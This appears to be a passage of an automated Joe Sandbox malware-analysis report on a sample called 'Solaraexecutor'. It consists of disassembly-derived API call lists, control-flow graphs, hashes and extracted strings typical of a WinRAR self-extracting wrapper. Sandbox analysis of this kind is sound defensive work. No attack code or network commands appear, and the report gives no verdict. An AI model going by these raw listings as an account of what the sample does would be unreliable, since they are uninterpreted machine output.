                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                      • String ID: PNG
                                                      • API String ID: 211097158-364855578
                                                      • Opcode ID: f847c44e3107ab960203a091755a292ccbac6d72493c833544969449e9c6f34f
                                                      • Instruction ID: 30a44955d31dbe51a2f7c1ff8e7c7a9ca975d7112c24681b51f3aa9881867214
                                                      • Opcode Fuzzy Hash: f847c44e3107ab960203a091755a292ccbac6d72493c833544969449e9c6f34f
                                                      • Instruction Fuzzy Hash: 9B316DB5601702AFD7119F25EC88D1BBBA9EF847A2F080519F845C2760EB71D9449AB1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1029 d2a69b-d2a6bf call d3ec50 1032 d2a6c1-d2a6ce FindFirstFileW 1029->1032 1033 d2a727-d2a730 FindNextFileW 1029->1033 1034 d2a742-d2a7ff call d30602 call d2c310 call d315da * 3 1032->1034 1036 d2a6d0-d2a6e2 call d2bb03 1032->1036 1033->1034 1035 d2a732-d2a740 GetLastError 1033->1035 1040 d2a804-d2a811 1034->1040 1037 d2a719-d2a722 1035->1037 1044 d2a6e4-d2a6fc FindFirstFileW 1036->1044 1045 d2a6fe-d2a707 GetLastError 1036->1045 1037->1040 1044->1034 1044->1045 1047 d2a717 1045->1047 1048 d2a709-d2a70c 1045->1048 1047->1037 1048->1047 1050 d2a70e-d2a711 1048->1050 1050->1047 1052 d2a713-d2a715 1050->1052 1052->1037
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6C4
                                                        • Part of subcall function 00D2BB03: _wcslen.LIBCMT ref: 00D2BB27
                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6F2
                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6FE
                                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A728
                                                      • GetLastError.KERNEL32(?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A734
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                      • String ID:
                                                      • API String ID: 42610566-0
                                                      • Opcode ID: f4c44c3e480cd433c0f4d00953f88095caeaa46707afbb4e7670bc8e527d98f1
                                                      • Instruction ID: a71e373bc3de00dce1e96056e098e2d6e4dcc79bff3941e65f2eab9884db7af3
                                                      • Opcode Fuzzy Hash: f4c44c3e480cd433c0f4d00953f88095caeaa46707afbb4e7670bc8e527d98f1
                                                      • Instruction Fuzzy Hash: B741B432500225ABC715DF68DC84AE9F7B8FB58354F044196E95DD3240D7346E90CFB4
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,?,00D47DC4,00000000,00D5C300,0000000C,00D47F1B,00000000,00000002,00000000), ref: 00D47E0F
                                                      • TerminateProcess.KERNEL32(00000000,?,00D47DC4,00000000,00D5C300,0000000C,00D47F1B,00000000,00000002,00000000), ref: 00D47E16
                                                      • ExitProcess.KERNEL32 ref: 00D47E28
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: c91f3d4658b72f5ad9a83b699c74126a286410a273809e377f69e16b53f2c919
                                                      • Instruction ID: 3ee3b1170317335d3bb5ea3b0ac7277927f3304cc20b4f6a60e1bdaff4de8606
                                                      • Opcode Fuzzy Hash: c91f3d4658b72f5ad9a83b699c74126a286410a273809e377f69e16b53f2c919
                                                      • Instruction Fuzzy Hash: 08E0B631004748ABCF126F65DD09A4A7F6AEB50392B044564FC19CB272CB36DE56DBB0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: 4d9428a8e80cfc5fd3b960b4b2dc4ff0214ea23c7511cffc4374409afa20ac1f
                                                      • Instruction ID: 94b4f9b33a15e8731db59f58c7549bcaa0026d2566496df3324a8096ea2c561c
                                                      • Opcode Fuzzy Hash: 4d9428a8e80cfc5fd3b960b4b2dc4ff0214ea23c7511cffc4374409afa20ac1f
                                                      • Instruction Fuzzy Hash: 08824D70905265AEDF15CF64D891BFAB7B9FF25308F0C41B9E8499B142CB315A88DB70
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D3B7E5
                                                        • Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
                                                        • Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370
                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3B8D1
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3B8EF
                                                      • IsDialogMessageW.USER32(?,?), ref: 00D3B902
                                                      • TranslateMessage.USER32(?), ref: 00D3B910
                                                      • DispatchMessageW.USER32(?), ref: 00D3B91A
                                                      • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00D3B93D
                                                      • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00D3B960
                                                      • GetDlgItem.USER32(?,00000068), ref: 00D3B983
                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D3B99E
                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00D535F4), ref: 00D3B9B1
                                                        • Part of subcall function 00D3D453: _wcslen.LIBCMT ref: 00D3D47D
                                                      • SetFocus.USER32(00000000), ref: 00D3B9B8
                                                      • _swprintf.LIBCMT ref: 00D3BA24
                                                        • Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5
                                                        • Part of subcall function 00D3D4D4: GetDlgItem.USER32(00000068,00D7FCB8), ref: 00D3D4E8
                                                        • Part of subcall function 00D3D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00D3AF07,00000001,?,?,00D3B7B9,00D5506C,00D7FCB8,00D7FCB8,00001000,00000000,00000000), ref: 00D3D510
                                                        • Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D3D51B
                                                        • Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D535F4), ref: 00D3D529
                                                        • Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D3D53F
                                                        • Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D3D559
                                                        • Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D3D59D
                                                        • Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D3D5AB
                                                        • Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D3D5BA
                                                        • Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D3D5E1
                                                        • Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D543F4), ref: 00D3D5F0
                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00D3BA68
                                                      • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00D3BA90
                                                      • GetTickCount.KERNEL32 ref: 00D3BAAE
                                                      • _swprintf.LIBCMT ref: 00D3BAC2
                                                      • GetLastError.KERNEL32(?,00000011), ref: 00D3BAF4
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00D3BB43
                                                      • _swprintf.LIBCMT ref: 00D3BB7C
                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00D3BBD0
                                                      • GetCommandLineW.KERNEL32 ref: 00D3BBEA
                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00D3BC47
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00D3BC6F
                                                      • Sleep.KERNEL32(00000064), ref: 00D3BCB9
                                                      • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00D3BCE2
                                                      • CloseHandle.KERNEL32(00000000), ref: 00D3BCEB
                                                      • _swprintf.LIBCMT ref: 00D3BD1E
                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3BD7D
                                                      • SetDlgItemTextW.USER32(?,00000065,00D535F4), ref: 00D3BD94
                                                      • GetDlgItem.USER32(?,00000065), ref: 00D3BD9D
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00D3BDAC
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00D3BDBB
                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3BE68
                                                      • _wcslen.LIBCMT ref: 00D3BEBE
                                                      • _swprintf.LIBCMT ref: 00D3BEE8
                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D3BF32
                                                      • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00D3BF4C
                                                      • GetDlgItem.USER32(?,00000068), ref: 00D3BF55
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00D3BF6B
                                                      • GetDlgItem.USER32(?,00000066), ref: 00D3BF85
                                                      • SetWindowTextW.USER32(00000000,00D6A472), ref: 00D3BFA7
                                                      • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00D3C007
                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3C01A
                                                      • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00D3C0BD
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00D3C197
                                                      • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00D3C1D9
                                                        • Part of subcall function 00D3C73F: __EH_prolog.LIBCMT ref: 00D3C744
                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3C1FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                      • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                      • API String ID: 3445078344-2238251102
                                                      • Opcode ID: 728e20b8af470e2dce3c6ea7dcb0cb99f4f1ae6593b3612cdc9106668895923d
                                                      • Instruction ID: ff4f1110f4f1dd1dc1148f763f435d9cb72a084d1e0d826ebd15918eebefcc7e
                                                      • Opcode Fuzzy Hash: 728e20b8af470e2dce3c6ea7dcb0cb99f4f1ae6593b3612cdc9106668895923d
                                                      • Instruction Fuzzy Hash: 42421471944358BEEB219B749C4AFBE7B6CEB11B10F040155F648F62D2DBB4AA48CB31

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 268 d30863-d30886 call d3ec50 GetModuleHandleW 271 d308e7-d30b48 268->271 272 d30888-d3089f GetProcAddress 268->272 273 d30c14-d30c40 GetModuleFileNameW call d2c29a call d30602 271->273 274 d30b4e-d30b59 call d475fb 271->274 275 d308a1-d308b7 272->275 276 d308b9-d308c9 GetProcAddress 272->276 290 d30c42-d30c4e call d2b146 273->290 274->273 285 d30b5f-d30b8d GetModuleFileNameW CreateFileW 274->285 275->276 279 d308e5 276->279 280 d308cb-d308e0 276->280 279->271 280->279 288 d30c08-d30c0f CloseHandle 285->288 289 d30b8f-d30b9b SetFilePointer 285->289 288->273 289->288 291 d30b9d-d30bb9 ReadFile 289->291 297 d30c50-d30c5b call d3081b 290->297 298 d30c7d-d30ca4 call d2c310 GetFileAttributesW 290->298 291->288 294 d30bbb-d30be0 291->294 296 d30bfd-d30c06 call d30371 294->296 296->288 305 d30be2-d30bfc call d3081b 296->305 297->298 307 d30c5d-d30c7b CompareStringW 297->307 308 d30ca6-d30caa 298->308 309 d30cae 298->309 305->296 307->298 307->308 308->290 310 d30cac 308->310 311 d30cb0-d30cb5 309->311 310->311 313 d30cb7 311->313 314 d30cec-d30cee 311->314 315 d30cb9-d30ce0 call d2c310 GetFileAttributesW 313->315 316 d30cf4-d30d0b call d2c2e4 call d2b146 314->316 317 d30dfb-d30e05 314->317 322 d30ce2-d30ce6 315->322 323 d30cea 315->323 327 d30d73-d30da6 call d24092 AllocConsole 316->327 328 d30d0d-d30d6e call d3081b * 2 call d2e617 call d24092 call d2e617 call d3a7e4 316->328 322->315 325 d30ce8 322->325 323->314 325->314 333 d30df3-d30df5 ExitProcess 327->333 334 d30da8-d30ded GetCurrentProcessId AttachConsole call d43e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 00D3087C
                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D3088E
                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D308BF
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D30B69
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D30B83
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D30B93
                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00D53C7C,00000000), ref: 00D30BB1
                                                      • CloseHandle.KERNEL32(00000000), ref: 00D30C09
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D30C1E
                                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00D53C7C,?,00000000,?,00000800), ref: 00D30C72
                                                      • GetFileAttributesW.KERNELBASE(?,?,00D53C7C,00000800,?,00000000,?,00000800), ref: 00D30C9C
                                                      • GetFileAttributesW.KERNEL32(?,?,00D53D44,00000800), ref: 00D30CD8
                                                        • Part of subcall function 00D3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D30836
                                                        • Part of subcall function 00D3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D2F2D8,Crypt32.dll,00000000,00D2F35C,?,?,00D2F33E,?,?,?), ref: 00D30858
                                                      • _swprintf.LIBCMT ref: 00D30D4A
                                                      • _swprintf.LIBCMT ref: 00D30D96
                                                        • Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5
                                                      • AllocConsole.KERNEL32 ref: 00D30D9E
                                                      • GetCurrentProcessId.KERNEL32 ref: 00D30DA8
                                                      • AttachConsole.KERNEL32(00000000), ref: 00D30DAF
                                                      • _wcslen.LIBCMT ref: 00D30DC4
                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D30DD5
                                                      • WriteConsoleW.KERNEL32(00000000), ref: 00D30DDC
                                                      • Sleep.KERNEL32(00002710), ref: 00D30DE7
                                                      • FreeConsole.KERNEL32 ref: 00D30DED
                                                      • ExitProcess.KERNEL32 ref: 00D30DF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                      • API String ID: 1207345701-3298887752
                                                      • Opcode ID: 288fe95475a6081534db73cfd24ad28f09e37472cb1b36026b278852b468f6e6
                                                      • Instruction ID: 73b1418ff653412bcdb8af9ab96b752983c7a70f55b42bd00cdd49478b0caf4f
                                                      • Opcode Fuzzy Hash: 288fe95475a6081534db73cfd24ad28f09e37472cb1b36026b278852b468f6e6
                                                      • Instruction Fuzzy Hash: 61D162B1008344ABDB219F54D859A9FBBF8EF8578AF50491DFD8596380DBB0864CCB72

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 347 d3c73f-d3c757 call d3eb78 call d3ec50 352 d3d40d-d3d418 347->352 353 d3c75d-d3c787 call d3b314 347->353 353->352 356 d3c78d-d3c792 353->356 357 d3c793-d3c7a1 356->357 358 d3c7a2-d3c7b7 call d3af98 357->358 361 d3c7b9 358->361 362 d3c7bb-d3c7d0 call d31fbb 361->362 365 d3c7d2-d3c7d6 362->365 366 d3c7dd-d3c7e0 362->366 365->362 367 d3c7d8 365->367 368 d3c7e6 366->368 369 d3d3d9-d3d404 call d3b314 366->369 367->369 370 d3ca5f-d3ca61 368->370 371 d3c9be-d3c9c0 368->371 372 d3c7ed-d3c7f0 368->372 373 d3ca7c-d3ca7e 368->373 369->357 380 d3d40a-d3d40c 369->380 370->369 378 d3ca67-d3ca77 SetWindowTextW 370->378 371->369 376 d3c9c6-d3c9d2 371->376 372->369 377 d3c7f6-d3c850 call d3a64d call d2bdf3 call d2a544 call d2a67e call d26edb 372->377 373->369 375 d3ca84-d3ca8b 373->375 375->369 381 d3ca91-d3caaa 375->381 382 d3c9e6-d3c9eb 376->382 383 d3c9d4-d3c9e5 call d47686 376->383 438 d3c98f-d3c9a4 call d2a5d1 377->438 378->369 380->352 385 d3cab2-d3cac0 call d43e13 381->385 386 d3caac 381->386 389 d3c9f5-d3ca00 call d3b48e 382->389 390 d3c9ed-d3c9f3 382->390 383->382 385->369 402 d3cac6-d3cacf 385->402 386->385 394 d3ca05-d3ca07 389->394 390->394 399 d3ca12-d3ca32 call d43e13 call d43e3e 394->399 400 d3ca09-d3ca10 call d43e13 394->400 421 d3ca34-d3ca3b 399->421 422 d3ca4b-d3ca4d 399->422 400->399 406 d3cad1-d3cad5 402->406 407 d3caf8-d3cafb 402->407 411 d3cb01-d3cb04 406->411 412 d3cad7-d3cadf 406->412 407->411 414 d3cbe0-d3cbee call d30602 407->414 419 d3cb11-d3cb2c 411->419 420 d3cb06-d3cb0b 411->420 412->369 417 d3cae5-d3caf3 call d30602 412->417 430 d3cbf0-d3cc04 call d4279b 414->430 417->430 433 d3cb76-d3cb7d 419->433 434 d3cb2e-d3cb68 419->434 420->414 420->419 427 d3ca42-d3ca4a call d47686 421->427 428 d3ca3d-d3ca3f 421->428 422->369 429 d3ca53-d3ca5a call d43e2e 422->429 427->422 428->427 429->369 448 d3cc11-d3cc62 call d30602 call d3b1be GetDlgItem SetWindowTextW SendMessageW call d43e49 430->448 449 d3cc06-d3cc0a 430->449 440 d3cbab-d3cbce call d43e13 * 2 433->440 441 d3cb7f-d3cb97 call d43e13 433->441 469 d3cb6a 434->469 470 d3cb6c-d3cb6e 434->470 455 d3c855-d3c869 SetFileAttributesW 438->455 456 d3c9aa-d3c9b9 call d2a55a 438->456 440->430 475 d3cbd0-d3cbde call d305da 440->475 441->440 463 d3cb99-d3cba6 call d305da 441->463 481 d3cc67-d3cc6b 448->481 449->448 454 d3cc0c-d3cc0e 449->454 454->448 457 d3c90f-d3c91f GetFileAttributesW 455->457 458 d3c86f-d3c8a2 call d2b991 call d2b690 call d43e13 455->458 456->369 457->438 467 d3c921-d3c930 DeleteFileW 457->467 490 d3c8b5-d3c8c3 call d2bdb4 458->490 491 d3c8a4-d3c8b3 call d43e13 458->491 463->440 467->438 474 d3c932-d3c935 467->474 469->470 470->433 478 d3c939-d3c965 call d24092 GetFileAttributesW 474->478 475->430 488 d3c937-d3c938 478->488 489 d3c967-d3c97d MoveFileW 478->489 481->369 485 d3cc71-d3cc85 SendMessageW 481->485 485->369 488->478 489->438 492 d3c97f-d3c989 MoveFileExW 489->492 490->456 497 d3c8c9-d3c908 call d43e13 call d3fff0 490->497 491->490 491->497 492->438 497->457
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D3C744
                                                        • Part of subcall function 00D3B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D3B3FB
                                                      • _wcslen.LIBCMT ref: 00D3CA0A
                                                      • _wcslen.LIBCMT ref: 00D3CA13
                                                      • SetWindowTextW.USER32(?,?), ref: 00D3CA71
                                                      • _wcslen.LIBCMT ref: 00D3CAB3
                                                      • _wcsrchr.LIBVCRUNTIME ref: 00D3CBFB
                                                      • GetDlgItem.USER32(?,00000066), ref: 00D3CC36
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00D3CC46
                                                      • SendMessageW.USER32(00000000,00000143,00000000,00D6A472), ref: 00D3CC54
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D3CC7F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                      • API String ID: 2804936435-312220925
                                                      • Opcode ID: 83ec09a2a3152ff6f3a769bca516af6e05b2369bc2bfe9ea4fd1a9d3cb766dca
                                                      • Instruction ID: 029510e107a585f9866bedddd7934b9a875a9eef284cedb43a1ecf7fa3493211
                                                      • Opcode Fuzzy Hash: 83ec09a2a3152ff6f3a769bca516af6e05b2369bc2bfe9ea4fd1a9d3cb766dca
                                                      • Instruction Fuzzy Hash: 98E132B2900219AADF25DBA4DC85EEE73BCEB04350F4441A6FA49E7150EB749F848F71
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D2DA70
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D2DAAC
                                                        • Part of subcall function 00D2C29A: _wcslen.LIBCMT ref: 00D2C2A2
                                                        • Part of subcall function 00D305DA: _wcslen.LIBCMT ref: 00D305E0
                                                        • Part of subcall function 00D31B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D2BAE9,00000000,?,?,?,00010424), ref: 00D31BA0
                                                      • _wcslen.LIBCMT ref: 00D2DDE9
                                                      • __fprintf_l.LIBCMT ref: 00D2DF1C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                      • API String ID: 566448164-801612888
                                                      • Opcode ID: 6be21bd273dbf8aba5e08e8e0410d4ddca2b0a157fd557ef2e125acfb50e004a
                                                      • Instruction ID: efa98634795b0225cd2fbf4689c35e77900ba31f29281a28c50c64e02d4c237e
